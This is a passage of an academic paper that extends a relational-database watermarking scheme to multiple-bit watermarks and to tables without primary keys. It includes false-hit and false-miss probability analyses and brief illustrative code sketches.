Consider a database relation R that has a primary key P and ν numerical attributes A0,..., Aν–1. Let there be η tuples. A portion of the tuples is selected for embedding watermark information according to a control parameter γ (γ < η). The selection is also determined by a secret key K, known only to the owner of the data, as well as by the primary key. Any tuple r is selected if S1(K, r.P) mod γ = 0, where S1(K, r.P) is the first number generated by S(K, r.P), and S(K, r.P) is a cryptographic pseudorandom sequence generator seeded with the secret key K and the primary key r.P of tuple r. Given a sequence of numbers S1, S2,... generated by S, it is computationally infeasible to derive the secret key or to predict the next number in the sequence. Due to the uniqueness of the primary key, roughly one out of every γ tuples is selected for embedding watermark information. For each selected tuple r, the AK scheme selects exactly one least-significant bit j from attribute Ai and replaces it with a mark bit x, where i = S2(K, r.P) mod ν, j = S3(K, r.P) mod ξ, and x = 0 if S4(K, r.P) is even and x = 1 otherwise. Here, ξ is another control parameter determining the range of least-significant bits of each value that may be modified. For ownership detection, the mark bits are located using the same process, provided that the secret key is known and the primary key remains unchanged. Let ω be the number of mark bits being localized (ω ≈ η/γ). To increase the robustness of the detection process, the ownership is claimed if more than τω of the localized bits are as expected, where τ ∈ [0.5, 1) is a control parameter related to the assurance of the detection process. The AK scheme has the following advantages: It is (a) key based, meaning all aspects of the scheme are determined by a secret key and a primary key, (b) blind, that is, the detection process does not require knowledge of the original database or the embedded information, (c) incrementally updatable, where each tuple is marked independently of all other tuples, (d)
error tolerable, meaning the error introduced by embedding mark bits can be controlled such that its impact on the mean and variance of the marked attributes is minuscule, and (e) robust, where the detection process is robust to a variety of attacks including bit-flipping attacks, mix-and-match attacks, additive attacks, and invertibility attacks. In particular, the scheme is robust against tuple-related attacks such as tuple modification, deletion, and insertion. To motivate our research, we examine the following assumptions that are used in the AK scheme:

• Error tolerance: A database relation being watermarked consists of a number of numeric attributes. It is acceptable to change a small number of ξ least-significant bits in some numeric values; however, the value of the data will be degraded significantly if all or a large number of such bits change.
• Primary-key criticality: A database relation being watermarked has a primary-key attribute that either does not change or can be recovered. The primary-key attribute contains essential information such that modification or deletion of this information will substantially reduce the value of the data.
• Attribute order dependence: A database relation being watermarked has a fixed order of attributes that either does not change or can be recovered. This assumption is implicit in Agrawal and Kiernan (2002).
The scheme depends critically on a primary key and the original order of database attributes. The scheme does not apply if the data have no primary-key attribute or if either the primary key or the order of attributes is modified. The scheme is therefore not robust against attribute-related attacks such as attribute deletion and insertion. In this article, we present the view that the AK scheme actually embeds a 1-bit watermark, and we extend it to a multiple-bit watermark. The extended scheme provides an upper bound for the probability that a valid watermark is detected from unmarked data, or a fictitious secret key is discovered from pirated data. This upper bound is independent of the size of the data. Then we drop the assumptions for primary-key criticality and attribute order dependence by constructing a virtual primary key from some most-significant bits of some selected attributes. The attributes used for constructing the virtual primary key may vary from tuple to tuple, and the scheme does not depend on a priori ordering over the attributes. Our extended scheme is robust against not only tuple-related attacks, but also attribute-related ones. We also extend our scheme for embedding and detecting multiple watermarks so as to thwart additive attacks or prove joint ownership. As a result of our study, ownership detection can be fully automated for detecting any database relations with a guarantee of low false-detection rates. The remainder of this article is organized as follows. We first present a multiple-bits watermarking scheme for relational data. We then
Table 1. Notation in watermarking

η     Number of tuples that can be used in watermarking
ν     Number of numerical attributes that can be used in watermarking
ξ     Number of least-significant bits available in each value for watermarking
1/γ   Fraction of tuples that are used for watermarking
K     Secret key
S     Cryptographic pseudorandom sequence generator
τ     Threshold in watermark detection
extend it by removing the assumptions on the primary key and attribute order. We also extend our scheme to multiple watermarks. In the related-work section, we compare our work with many other solutions including newly published ones. The final section presents our conclusion. For ease of reference, Table 1 gives the notation that is used in this article.
RELATED WORK

In this section, we summarize the related work in three categories: robust watermarking, fragile watermarking, and public watermarking.
Robust Watermarking Recent development of watermarking techniques has been targeted on relational databases to accommodate typical database operations such as tuple insertion, deletion, and modification. The AK scheme (Agrawal & Kiernan, 2002) is a typical robust watermarking scheme that embeds a single-bit watermark to relational data. The scheme alters some least-significant bits in numerical attributes such that the alteration does not degrade the data beyond their usability and that the pattern of alteration can be detected even if the data have been modified. In this article, we extend the AK scheme to (a) allow multiple-bit information to be embedded and detected, (b) provide an upper bound for the probability that a valid watermark is detected from unmarked data, or a fictitious secret key is discovered from pirated data, regardless of the size of data, (c) deal with database relations without primary-key attributes, and (d) embed and detect multiple watermarks for thwarting additive attacks and for proving joint ownership. Parallel to our work, a multibit watermark scheme was proposed by Sion, Atallah, and Prabhakar (2003). The scheme is designed primarily for watermarking a set of real numbers {x1,..., xn}
2226
by manipulating its distributions. The first step of watermark insertion is to sort the values according to a cryptographically keyed hash of the set of most-significant bits of the normalized values. Then, a maximum number of nonintersecting subsets of values are formed, where each subset consists of a certain number of adjacent items after sorting. Embedding a watermark bit into a subset is achieved by making minor changes to some of the data values in this subset such that the number of values that are outliers in the distribution is less than a smaller threshold (for watermark bit 0) or greater than a larger threshold (for watermark bit 1). Note that some of the groups may not be able to be watermarked given userspecified change tolerance. Also note that some redundant bits must be embedded such that the original multibit watermark can be recovered in watermark detection even if some of the encoded bits are destroyed in data attacks. Compared with our multibit watermarking scheme, this scheme is robust against linear transformation and does not depend on the existence of a primary key. On the other hand, since it requires sorting, grouping, and distribution manipulating, it incurs more watermarking overhead, especially expensive for watermarking large data sets or frequently updated databases. Robust watermarking schemes have also been developed for protecting copyrights for categorical data, XML (extensible markup language) data, and data cubes. In Sion (2004), the author proposed to watermark a categorical attribute by changing some of its values to other values of the attribute (e.g., red is changed to green) if such change is tolerable in certain applications. Sion’s scheme is equivalent to the AK scheme in selecting a number of tuples for watermarking a categorical attribute A based on a secret key K and the primary-key attribute P. For each selected tuple r, exactly one bit is chosen from watermark information wm_data and is embedded to r.A, where the watermark information wm_data is generated from a shorter watermark wm using the
A Multiple-Bits Watermark for Relational Data
error-correcting code (ECC). The bit position is determined by a pseudorandom value generated from the secret key and the primary key r.P. To embed the chosen bit b, the current categorical value r.A is changed to another valid value of A, which is chosen from a list LA of all valid values of A. In this process, any value a can be chosen from LA (to replace r.A) as long as a’s index in LA has the least-significant bit b. For watermark detection, a number of tuples are selected the same way as in watermark insertion. Then, for each selected tuple r, a bit position in wm_data is located and the corresponding bit value in wm_data is extracted from the least-significant bit of the index of r.A in the list LA. After all of the tuples are processed, the ECC takes as input wm_data and produces the corresponding wm. The ECC can tolerate certain errors in detecting wm_data and still produce the same wm in watermark detection. This scheme has been extended to protect the ownership and privacy of outsourced medical data (Bertino, Ooi, Yang, & Deng, 2005) that are subject to generalization (Kim, Sengupta, Fox, & Dalkilic, 2007) and aggregation (Woo, Lee, Lee, Loh, & Whang, 2007) attacks. The AK scheme has also been extended by Ng and Lau (2005) to watermarking XML data. In this scheme, the owner of XML data is required to choose locators, which are XML elements having unique values that can serve as primary keys as in the AK scheme. While a textual value of an element is selected to embed a mark bit, one of its words is replaced by a synonym function based on a well-known synonym database WordNet. Gross-Amblard (2003) considered relational or XML data that are only partially accessible through a set of parametric queries in his querypreserving watermarking scheme. The scheme modifies some numerical values in watermark insertion in a way that the distortions introduced to the results of those parametric queries are small and that the watermark can be detected from the results of those queries. Another work on watermarking XML data was conducted by Zhou,
Pang, and Tan (2007). They proposed creating queries to identify the data elements in XML data that can be used for embedding watermarks. The identifying queries are resilient against data reorganization and redundancy removal through query rewriting. If an identified element is a leaf node, watermark insertion is performed by modifying its value; otherwise, it is performed by adding to or deleting its child nodes. The usability of XML data is measured by query templates. The results of certain basic queries on the data remain useful after watermarking or attacks. J. Guo, Li, Deng, and Chen (2006) proposed a robust watermarking scheme to protect the owner’s rights in data-cube applications. The basic assumption is that all values able to be watermarked in a data cube are numeric, and those small changes in a small portion of these values are acceptable. For each cell in a data cube, the owner of the data seeds a cryptographically secure pseudorandom sequence generator S with a secret key K in concatenation with the cell’s feature attributes. A small portion of cells are selected and for each selected cell, a bit position among ξ least-significant bits is selected to embed a mark bit in the same way as in the AK scheme. Since the most prevalent data-cube operations are aggregation queries (Pears & Houliston, 2007), a minicube is constructed for each cell that is modified in watermark insertion so as to eliminate the errors introduced by watermarking to aggregation queries. J. Guo et al. have shown that this can be done effectively and efficiently in real-world applications even for very large data cubes. The AK scheme has also been extended to fingerprinting relational databases (Li, Swarup, & Jajodia, 2005). Fingerprinting is used to insert digital marks for the purpose of identifying the recipients who have been provided data, which is different from watermarking in which digital marks are inserted for the purpose of identifying the source of data. The challenge is to address the collusion attack in which a group of legitimate users work collaboratively to create a pirated copy
of protected data (Boneh & Shaw, 1995, 1998; Safavi-Naini & Wang, 2001).
Fragile Watermarking

Different from robust watermarking, the purpose of fragile watermarking is not to protect copyright, but to detect and localize possible attacks that modify a distributed or published database. Li, Guo, and Jajodia's scheme (2004) is an example of fragile watermarking. This scheme embeds a watermark into relational data by partitioning the tuples into groups and manipulating the order of the tuples in each group, where the grouping and ordering of the tuples are determined by a secret key and the primary key of the tuples. A watermark can be computed by hashing or signing all tuple values in a group. Note that even though the watermark can be derived from a digital signature, it is embedded into the data, which is different from integrating digital signatures with relational databases (Reid & Dhillon, 2003). Any change to the underlying data can be detected at a group level with a high probability in watermark detection. This solution introduces no error to the underlying data and can be easily extended to watermarking multidimensional data cubes. To improve the precision of tamper localization, H. Guo, Li, Liu, and Jajodia (2006) proposed another fragile watermarking scheme under the assumptions that the database relation to be watermarked has numerical attributes and that the errors introduced in the two least-significant bits of each value can be tolerated. In this solution, the tuples are first divided into groups, as in the previous scheme. Within each group, a keyed tuple hash is computed for each tuple (with the attributes organized in a fixed order), and a keyed attribute hash is computed for each attribute (with the tuples organized in a fixed order). When these hash values are computed, the two least-significant bits of all attribute values are ignored. Each tuple hash is embedded into the corresponding tuple and each attribute hash into the corresponding attribute.
The embedded hash values actually form a watermark grid, which helps to detect, localize, and characterize database attacks. Recently, H. Guo, Li, and Jajodia (2007) proposed a fragile watermarking scheme for detecting malicious modifications to streaming data. The scheme partitions a numerical data stream into groups based on synchronization points. A data element xi is defined to be a synchronization point if its keyed hash HMAC(K, xi) mod m = 0, where K is a secret key and m is a secret parameter. For each group of data that falls between two synchronization points, the scheme computes and embeds a fragile watermark so that any modification to the data can be detected and localized at a group level in watermark detection.
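To make the grouping rule concrete, the sketch below partitions a numeric stream at such synchronization points. It is only an illustration: HMAC-SHA1 and the repr()-based serialization of values are stand-ins for whatever keyed hash and encoding the cited scheme uses, and the per-group watermark computation and embedding are omitted.

```python
# Sketch of grouping a numeric stream at synchronization points, where x_i is a
# synchronization point if HMAC(K, x_i) mod m == 0. HMAC-SHA1 and repr() are
# stand-ins; per-group watermark embedding is omitted.
import hashlib
import hmac

def is_sync_point(key: bytes, value: float, m: int) -> bool:
    digest = hmac.new(key, repr(value).encode(), hashlib.sha1).digest()
    return int.from_bytes(digest, "big") % m == 0

def group_stream(key: bytes, stream, m: int):
    groups, current = [], []
    for x in stream:
        current.append(x)
        if is_sync_point(key, x, m):     # close the group at a synchronization point
            groups.append(current)
            current = []
    return groups, current               # 'current' is the still-open trailing group
```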
Public Watermarking One common feature of most robust watermarking techniques is that they are secret-key based, where ownership is proven through the knowledge of a secret key that is used for both watermark insertion and detection. The secret-key-based approach is not suitable for proving ownership to the public (e.g., in a court). To prove ownership of suspicious data, the owner has to reveal his or her secret key to the public for watermark detection. After being used one time, the key is no longer secret. With access to the key, a pirate can invalidate watermark detection by either removing watermarks from protected data or adding a false watermark to nonwatermarked data. Li and Deng (2006) proposed a unique database watermarking scheme that can be used for publicly verifiable ownership protection. Given a database relation to be published or distributed, the owner of the data uses a public watermark key to generate a public watermark, which is a relation with binary attributes that are derived from the original database. Anyone can use the watermark key and the watermark to check whether a suspicious copy of the data is watermarked, and, if so, prove the ownership
of the data by checking a watermark certificate officially signed by a trusted certificate authority, DB-CA. The watermark certificate contains the owner’s ID, the watermark key, the hashes of the watermark and database relation, the first time the relation was certified, the validity period of the current certificate, and the DB-CA’s signature. The watermark certificate may be revoked and recertified in the case of identity change, ownership change, DB-CA compromise, or data update. Therefore, the revocation status also needs to be checked in proving the ownership.
EMBEDDING AND DETECTING MULTIPLE-BITS WATERMARK

In this section, we extend the AK scheme under the same set of assumptions: error tolerance, primary-key criticality, and attribute order dependence. The extended scheme is used for embedding a multiple-bits watermark rather than a 1-bit watermark as in the AK scheme. Multiple-bits watermarks are useful for embedding owner information such as a name, logo, signature, or description of the underlying data. We prove that certain false-detection rates are bounded in our extended scheme.
Embedding Multiple Bits

The AK scheme embeds a 1-bit watermark only. This can be seen clearly by extending it to embedding a multiple-bits watermark W = (w0,..., wL−1). To embed W, the same scheme is used to (a) select some tuples, (b) select one attribute for each selected tuple r, (c) select one least-significant bit for each selected attribute, and (d) compute a mark bit x for each selected bit. Now the difference is that the mark bit is not used to replace the selected bit in the data directly; instead, one watermark bit wl is selected from W, where l = S5(K, r.P) mod L, and x XOR wl is used to replace the selected bit in the data. In watermark detection, the watermark bit
wl is recovered by computing XOR on a located bit in the data with the computed mark bit x. The ownership is claimed as long as the original watermark string W can be recovered from the data. The AK scheme can be considered a special case of this extended scheme in which W is the 1-bit string 0. Compared to the AK scheme, the same number ω ≈ η/ϕ of least-significant bits is selected in our extended scheme for embedding watermark information; thus, the error introduced by the embedding process is the same as in the AK scheme. The reader is referred to Agrawal et al. (2003) for more details on the analysis of watermarking error. The difference is that each watermark bit wl is embedded ϖ ≈ ω/L times, as compared to ω times in the original scheme; thus, the robustness analysis of the watermarking scheme must be adapted to take this into consideration. A preliminary analysis of our extended scheme was first reported in Li, Swarup, and Jajodia (2003a).
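A minimal sketch of the embedding and detection step for one selected value. The keyed generators S1 through S5 of the scheme are modeled here with HMAC, and the tuple, attribute, and bit selection steps are assumed to have already been done; this is an illustration under those assumptions, not the authors' code.

```python
import hmac
import hashlib

def S(key: bytes, label: str, value: str) -> int:
    # stand-in for the keyed pseudorandom generators S1..S5 of the scheme
    d = hmac.new(key, (label + "|" + value).encode(), hashlib.sha256).digest()
    return int.from_bytes(d, "big")

def embed_bit(key: bytes, primary_key: str, watermark) -> int:
    """Return the bit that replaces the selected LSB for one selected value."""
    L = len(watermark)
    mark_bit = S(key, "mark", primary_key) & 1     # mark bit x
    l = S(key, "S5", primary_key) % L              # which watermark bit is used
    return mark_bit ^ watermark[l]                 # x XOR w_l is embedded

def extract_bit(key: bytes, primary_key: str, located_bit: int, L: int):
    """Recover (l, w_l): XOR the located bit with the recomputed mark bit."""
    mark_bit = S(key, "mark", primary_key) & 1
    l = S(key, "S5", primary_key) % L
    return l, located_bit ^ mark_bit
```

Detection tallies, for each index l, how often 0 and 1 are recovered, and takes a (threshold or majority) vote to reconstruct W.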
Robustness Analysis for Multiple-Bits Scheme

The robustness of a watermarking scheme can be measured by the following probabilities: (a) the false hit rate, in which a valid watermark is detected from unmarked data; (b) the invertibility rate, where a fictitious secret key is derived from marked data; and (c) the false miss rate, in which no valid watermark is detected from marked data in the presence of various types of attacks. The smaller these probabilities, the more robust the watermarking scheme. In the robustness analysis, we use the following notation: (a) the probability function of the binomial distribution, b(k; n, p) = C(n, k) p^k q^(n−k), where q = 1 − p (i.e., the probability of obtaining exactly k successes out of n Bernoulli trials with probability p of success in any trial), and (b) the survival function of the binomial distribution, B(k; n, p) = Σ_{i=k+1}^{n} b(i; n, p) (i.e., the probability of having more than k successes in n independent Bernoulli trials).
False Hit

Being aware of the existence of a watermarking technique, a pirate may modify marked data so as to confuse ownership proof. Therefore, watermark detection may be applied not only to the original marked data, but also to unmarked data, both of different sizes.

Claim 1. If the detection algorithm is applied to unmarked data, then the false-hit rate is ∏_{i=0}^{L−1} B(τωi; ωi, 0.5) ≤ 1/2^L, where ωi > 0 is the number of times that the watermark bit i is extracted from data.

Proof. If the detection algorithm is applied to unmarked data, it may possibly return some binary string (w0,..., wL−1) as a potential watermark. Let wi be extracted from data ωi times, ωi > 0. Due to the use of pseudorandom generator S in detection, wi is extracted each time from unmarked data as 0 or 1 with the same probability 0.5. Due to the use of threshold τ in detection, wi is detected as 0 or 1 with the same probability B(τωi; ωi, 0.5). The probability that a binary string (w0,..., wL−1) is obtained in detection is ∏_{i=0}^{L−1} 2B(τωi; ωi, 0.5). Now, there is only one watermark in the space of 2^L possible binary strings. Thus, the probability that the binary string obtained matches the original watermark is 1/2^L. The false-hit rate is (1/2^L) ∏_{i=0}^{L−1} 2B(τωi; ωi, 0.5) = ∏_{i=0}^{L−1} B(τωi; ωi, 0.5).

The false-hit rate has an upper bound of 1/2^L because B(τωi; ωi, 0.5) ≤ 0.5 for τ ∈ [0.5, 1). The upper bound is independent of ωi and τ. Therefore, no matter what the size of the data and the detection threshold are, the false-hit rate can be reduced exponentially by increasing L. The AK scheme corresponds to a special case of our scheme where L = 1. In the AK scheme, the false-hit rate is B(τω; ω, 0.5), where ω is the total number of mark bits extracted from targeted data. The false-hit rate in the AK scheme may be controlled by the detection threshold τ. For example, for ω = 1,000, it is required that τ = 0.6 so that the false-hit rate is less than 10^−10. To reduce the
false-hit rate, one needs to increase the detection threshold τ. The side effect of increasing the threshold τ in detection is that the scheme is more vulnerable to some attacks. For example, the scheme will return no valid watermark from marked data if an attacker flips at least 100(1−τ)% of the ξ least-significant bits of all values. The smaller the parameter τ, the more robust the scheme is against such attacks, at the price of a larger false-hit rate. In our extended scheme, we can choose τ = 0.5 to maximize the robustness without degrading the false-hit rate significantly, as it is bounded by 1/2^L; therefore, a simple majority vote can be used in our watermark detection as long as the watermark is long enough (e.g., L = 40). In comparison, the false-hit rate is close to 50% for τ = 0.5 in the AK scheme, which is intolerable in most cases. Note that in the AK scheme, the false-hit rate depends not only on τ, but also on the size of the data (in terms of ω). Since the size of the data may change due to various attacks, one has to determine an appropriate τ by solving a false-hit equation for different sizes of data. The smaller the size of the data, the larger the τ required (and thus the weaker the scheme is against attacks). For example, if ω decreases from 1,000 to 100, then τ must increase from 0.6 to above 0.7 so as to keep the false-hit rate below 10^−10. In our extended scheme, a simple majority vote (i.e., τ = 0.5) can be used uniformly for any size of data, which significantly simplifies the detection process.
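The false-hit comparison above can be reproduced numerically with the binomial survival function. The sketch below assumes scipy is available and uses illustrative parameter values (ω = 1,000, L = 40).

```python
from scipy.stats import binom

def B(k, n, p):
    # survival function of the binomial distribution: P(more than k successes)
    return binom.sf(k, n, p)

omega = 1000                       # total number of mark bits extracted
# AK scheme (L = 1): the false-hit rate B(tau*omega; omega, 0.5) depends on tau
for tau in (0.5, 0.6, 0.7):
    print("AK, tau=%.1f: %.3e" % (tau, B(int(tau * omega), omega, 0.5)))

# Extended scheme with majority vote (tau = 0.5): bounded by 1/2**L
L = 40
w = omega // L                     # each watermark bit extracted about omega/L times
rate = B(w // 2, w, 0.5) ** L      # average case, all omega_i equal
print("multi-bit, L=%d: %.3e (bound %.3e)" % (L, rate, 0.5 ** L))
```

The AK line for τ = 0.5 comes out near 0.5, while the multi-bit line stays at roughly 1/2^40, illustrating why the majority vote is safe once L is long enough.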
Invertibility

Now consider the case in which a pirate discovers a secret key from marked data that yields a satisfactory watermark. A pirate can use the discovered key to claim legitimate ownership of the data. Alternatively, a pirate can claim innocence by asserting that the data owner used this type of invertibility attack to obtain the evidence of piracy.
Claim 2. If a pirate randomly selects a secret key, then the probability that this key causes a valid watermark to be detected from pirated data is

max(1/2^|K|, ∏_{i=0}^{L−1} B(τωi; ωi, 0.5)) ≤ max(1/2^|K|, 1/2^L),

where ωi > 0 is the number of times that watermark bit i is extracted from data.

Proof. The first term, 1/2^|K|, is the probability that the tried key is the real secret key K (assume that the length of the secret key is fixed and public). The second term is the probability of detecting a valid watermark from pirated data using a different secret key, which is the same as the probability of detecting a valid watermark from unmarked data. An attacker may choose his or her own parameters γ, L, and τ to increase this probability. In particular, if τ = 0.5 is selected, this term reduces to its upper bound 1/2^L.

Thwarting this invertibility attack requires choosing a long-enough watermark and secret key (e.g., L ≥ 40 and AES |K| ≥ 128). This requirement can be enforced by a standard process or public announcement. Note that an alternate convention might be to require τ to be greater than 0.5; however, an attacker may get around that convention by first reducing ωi (e.g., via a subset attack) before launching an invertibility attack. Consider the AK scheme, which corresponds to a special case of our scheme where L = 1. No matter how long a secret key is, the invertibility attack could succeed with high probability because the second term, B(τω; ω, 0.5), in the invertibility rate may approach 50% when an attacker manipulates the size of the data and the detection threshold. In comparison, this term in our scheme has the upper bound 1/2^L, which is independent of the size of the data and the detection threshold τ. Since the false-hit rate and invertibility rate in our scheme are controlled by the length of the watermark, we choose τ = 0.5 in the following so as to maximize the robustness of our scheme against various attacks.

False Miss
Watermarking schemes should be robust against malicious attacks or benign update operations that may destroy the embedded watermark. Since the embedded watermark can always be destroyed by making substantial modifications to marked data, we assume that when attacks modify data, they also degrade the value of the data. We consider the robustness of our watermarking scheme relative to typical database attacks. In this section, we focus on typical tuple-related attacks that have been considered in Agrawal and Kiernan (2002).
Value Modification

Consider value modification, in which an attacker randomly selects some data values and flips their least-significant bits. Assume that the attacker toggles each least-significant bit with probability pf, where pf ≤ 0.5 (if pf > 0.5, then watermark detection can be applied to transformed data in which each bit is flipped back); pf is called the flipping probability (the subscript f stands for flipping).

Claim 3. If a value modification attack is applied to a watermarked relation with flipping probability pf, then the false-miss rate is

1 − ∏_{i=0}^{L−1} (1 − B(ωi/2; ωi, pf)),

where ωi > 0 is the number of times that watermark bit wi is embedded in the data.

Proof. Due to the majority vote, watermark detection fails to detect watermark bit wi only if at least ωi/2 of the embedded bits that correspond to wi are toggled. Thus, the probability that the watermark bit is not recovered is B(ωi/2; ωi, pf). The probability that the entire watermark is not recovered (i.e., the false-miss rate) is 1 − ∏_{i=0}^{L−1} (1 − B(ωi/2; ωi, pf)).
Figure 1. False-miss rate under value modification attack
In the average case, we have ωi = ϖ = ω/L and the false-miss rate is 1 − (1 − B(ϖ/2; ϖ, pf))^L. Figure 1 plots the false-miss rate in the average case. The two parameter values that are varied are ϖ and pf. The figure uses the default value 100 for L. The figure shows that, with a proper choice of parameters, a successful attack requires pf to be large, causing a perceptible change to the data relation.
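A short sketch of the average-case false-miss computation, 1 − (1 − B(ϖ/2; ϖ, pf))^L, assuming scipy is available; the parameter values below are illustrative.

```python
from scipy.stats import binom

def false_miss_value_mod(varpi: int, L: int, pf: float) -> float:
    # bit w_i is lost only if more than varpi/2 of its embeddings are flipped
    per_bit_fail = binom.sf(varpi // 2, varpi, pf)
    return 1.0 - (1.0 - per_bit_fail) ** L

for pf in (0.1, 0.3, 0.5):
    print(pf, false_miss_value_mod(varpi=100, L=100, pf=pf))
```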
Tuple Deletion and Insertion

Consider tuple deletion, in which an attacker deletes a subset of tuples from a watermarked relation. Suppose that the attacker examines each tuple independently and deletes it with probability pd.

Claim 4. If a tuple deletion attack is applied to a watermarked relation, then the false-miss rate is

1 − ∏_{i=0}^{L−1} (1 − pd^ωi),

where ωi > 0 is the number of times that watermark bit wi is embedded in the data, and pd is the probability that a tuple is deleted in the attack.
Proof. For the attack to be successful, it must delete all embedded bits for at least one watermark bit. Now, each watermark bit wi is embedded ωi times, so the probability that all the embedded bits for wi are deleted is B(ωi − 1; ωi, pd) = pd^ωi. Therefore, the false-miss rate is 1 − ∏_{i=0}^{L−1} (1 − pd^ωi).

In the average case where ωi = ϖ = ω/L, the false-miss rate is 1 − (1 − pd^ϖ)^L. Figure 2 shows that a tuple deletion attack is unlikely to succeed unless a large number of tuples are deleted. A tuple deletion attack is a less effective attack than a value modification attack. However, it is more potent when used in combination with a value modification attack. A tuple deletion attack reduces the average number of times a watermark bit is embedded and hence makes the pirated relation more susceptible to value modification attacks. Figure 3 plots the false-miss rate as a function of the ratio of tuples deleted and the flipping probability in a combination attack. Another type of attack is the tuple insertion attack, in which an attacker takes a marked
Figure 2. False-miss rate under tuple deletion attack
Figure 3. False-miss rate under combination attack
relation and mixes it with η · pi tuples from other sources, where η is the number of tuples in the original relation and pi ≥ 0 is the insertion rate. In watermark detection, each watermark bit wl is extracted from those additional tuples roughly ωl · pi times, where ωl is the number of times the watermark bit is extracted from the original data. Then the probability that this watermark bit is not recovered due to the attack is B(ωl(1 + pi)/2; ωl · pi, 0.5).
It is then fairly straightforward to derive the false-miss rate for the tuple insertion attack. It is
more difficult for an attacker to confuse ownership proof by launching a tuple insertion attack than manipulating the same number of tuples in a tuple deletion attack.
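For completeness, the deletion and insertion false-miss rates can be computed in the same way. The following sketch assumes the average case (ωl = ϖ), assumes scipy is available, and uses illustrative parameters.

```python
from scipy.stats import binom

def false_miss_deletion(varpi: int, L: int, pd: float) -> float:
    # a watermark bit is lost only if all of its ~varpi embeddings are deleted
    return 1.0 - (1.0 - pd ** varpi) ** L

def false_miss_insertion(varpi: int, L: int, pi: float) -> float:
    # inserted tuples contribute ~varpi*pi random extractions per watermark bit;
    # the bit is lost if those random extractions outvote the varpi correct ones
    n_random = int(varpi * pi)
    threshold = int(varpi * (1 + pi) / 2)
    per_bit_fail = binom.sf(threshold, n_random, 0.5)
    return 1.0 - (1.0 - per_bit_fail) ** L

print(false_miss_deletion(varpi=100, L=100, pd=0.9))
print(false_miss_insertion(varpi=100, L=100, pi=1.0))
```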
WATERMARKING WITHOUT PRIMARY KEY

Both the AK scheme and our extended scheme depend critically on a primary key and the original order of database attributes. These schemes do not apply if the data have no primary key attribute, or if either the primary key or the order of attributes is modified. These schemes are therefore not robust against attribute-related attacks such as attribute deletion and insertion. In this section, we propose alternative schemes that do not depend on primary-key attributes or the attribute order. A preliminary analysis of these schemes was first reported in Li, Swarup, and Jajodia (2003b).
Element-Based Scheme

The multiple-bits scheme discussed in the previous section can be called tuple based, as it processes data tuple by tuple in watermark insertion and detection. An alternative approach is to process each numerical value independently. A virtual primary key vpk is constructed from each attribute value, or data element. We call such a scheme element based. For each element r.Ai of tuple r, the bits of r.Ai are partitioned into two parts: lsb(r.Ai) and vpk(r.Ai), where lsb(r.Ai) may be used to embed a watermark bit and vpk(r.Ai) is used as its virtual primary key. The least-significant-bit portion lsb consists of ξ bits, in which a watermark bit may be embedded. The virtual primary key vpk consists of the (most significant) bits except the bits in lsb. Changing vpk would introduce intolerable error into the underlying data.
Recall that tuple-based schemes embed one bit per γ tuples. To maintain the same ratio, the element-based scheme embeds one bit per γν elements: An element r.Ai is selected for embedding a watermark bit if S1(K, vpk(r.Ai)) mod γν equals 0. If element r.Ai is selected, its least-significant bit j in the lsb(r.Ai) portion is selected, where j= S3(K, vpk(r.Ai)) mod ξ. Then the element-based scheme embeds (or extracts) a watermark bit to (or from) the selected bit exactly as the tuple-based scheme does.
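A sketch of the element-based selection, assuming integer-valued elements, ξ = 2 reserved least-significant bits, and HMAC standing in for the generators S1 and S3; the names and constants are illustrative, not the authors' implementation.

```python
import hmac
import hashlib

XI = 2          # number of least-significant bits reserved for marking (xi)
GAMMA_NU = 40   # one bit embedded per gamma*nu elements on average

def keyed(key: bytes, label: str, msg: str) -> int:
    d = hmac.new(key, (label + "|" + msg).encode(), hashlib.sha256).digest()
    return int.from_bytes(d, "big")

def split_element(value: int):
    """Split an integer element into (vpk, lsb): high-order bits vs. the xi low bits."""
    return value >> XI, value & ((1 << XI) - 1)

def select_element(key: bytes, value: int):
    """Return the index of the LSB to mark, or None if the element is not selected."""
    vpk, _ = split_element(value)
    if keyed(key, "S1", str(vpk)) % GAMMA_NU != 0:
        return None
    return keyed(key, "S3", str(vpk)) % XI     # which of the xi low bits to use
```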
Combination-Based Scheme

Another solution is to combine some significant bits from multiple attributes for constructing the virtual primary key and to process the data tuple by tuple, based on each tuple's virtual primary key. We call such a scheme combination based. The construction of the virtual primary key does not depend on the order of the attributes. For each tuple r, the combination-based scheme computes its virtual primary key r.V by concatenating the k (1 ≤ k ≤ ν) keyed hash message authentication codes in {HMAC(K, vpk(r.Ai)): i = 0,…, ν−1} that are closest to 0 (hash values are interpreted as natural numbers when comparing with 0); in the case that the concatenation results in too-long binaries, the virtual primary key can be constructed by hashing the concatenation result. The attributes used for constructing the virtual primary key are not fixed but may change from tuple to tuple. Without knowing the secret key, an attacker is unable to determine which attributes are selected for constructing the virtual primary key in each tuple. The combination-based scheme then uses the tuple-based technique to process each tuple, but with two modifications. First, the combination-based scheme uses the virtual primary key in place of the real primary key. Second, for each tuple
r that has been selected, attribute Ai is chosen if its hash value HMAC(K, vpk(r.Ai)) is closest to 0 among all attributes' HMAC hash values. Multiple attributes may be selected if they have the same lowest HMAC hash value. In comparison, the tuple-based scheme selects a single attribute Ai if i = S2(K, vpk(r.Ai)) mod ν. Note that in the combination-based scheme, the attribute (or attributes) selected for embedding a watermark bit is among those that are used for constructing the virtual primary key (i.e., the lowest hash value is among the k lowest hash values). The construction of the virtual primary key depends on the hash values rather than on the order of the attributes.
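A sketch of the combination-based construction, assuming the vpk portions of a tuple's attribute values are given as a list. HMAC-SHA-256 stands in for the scheme's keyed hash, and the concatenation is hashed to keep the virtual primary key short, as suggested above; this is an illustration under those assumptions.

```python
import hmac
import hashlib

def h(key: bytes, value) -> int:
    # HMAC(K, vpk(r.Ai)) interpreted as a natural number
    d = hmac.new(key, str(value).encode(), hashlib.sha256).digest()
    return int.from_bytes(d, "big")

def virtual_primary_key(key: bytes, vpk_values, k: int) -> bytes:
    """Combine the k keyed hashes closest to 0 into one short virtual primary key."""
    smallest = sorted(h(key, v) for v in vpk_values)[:k]
    concat = "|".join(str(x) for x in smallest).encode()
    return hashlib.sha256(concat).digest()      # hash the concatenation to keep it short

def attributes_for_embedding(key: bytes, vpk_values):
    """Indices of the attribute(s) whose keyed hash is lowest (ties allowed)."""
    hashes = [h(key, v) for v in vpk_values]
    lowest = min(hashes)
    return [i for i, hv in enumerate(hashes) if hv == lowest]
```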
Robustness Analysis for Virtual-Primary-Key-Based Schemes

